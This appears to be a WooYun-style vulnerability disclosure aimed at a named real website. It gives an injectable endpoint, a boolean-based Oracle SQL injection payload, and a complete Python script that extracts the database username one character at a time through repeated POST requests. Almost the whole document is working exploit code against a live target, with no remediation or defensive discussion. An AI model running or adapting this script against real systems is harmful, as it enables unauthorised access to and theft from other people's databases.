WooYun.org

http://www.minanins.com/maechannel/manage/info/listNewsAjaxCallFront.do
infolisttype=4 and length(SYS_CONTEXT('USERENV','CURRENT_USER'))=13&infotype=2&page=1&status=1

#encoding=utf-8
import httplib
import time
import string
import sys
import re
import random
import urllib
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
print 'start to retrive Oracle user:'
user = ''
for i in range(1,14,1):
    for payload in payloads:
        conn = httplib.HTTPConnection('www.minanins.com', timeout=60)
        params = {
            
            'infotype': "2",
            
            'infolisttype': "4 and ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)),
            
            'page': "1",
            
            'status': "1",
            }
        conn.request(method='POST',
                     url='/maechannel/manage/info/listNewsAjaxCallFront.do',
                     body = urllib.urlencode(params),
                     headers = headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        #print html_doc
        conn.close()
        print '.',
        if re.search('2016',html_doc) > 0:  # true
            user += payload
            print '\n[in progress]', user
            break
print '\nOracle user is', user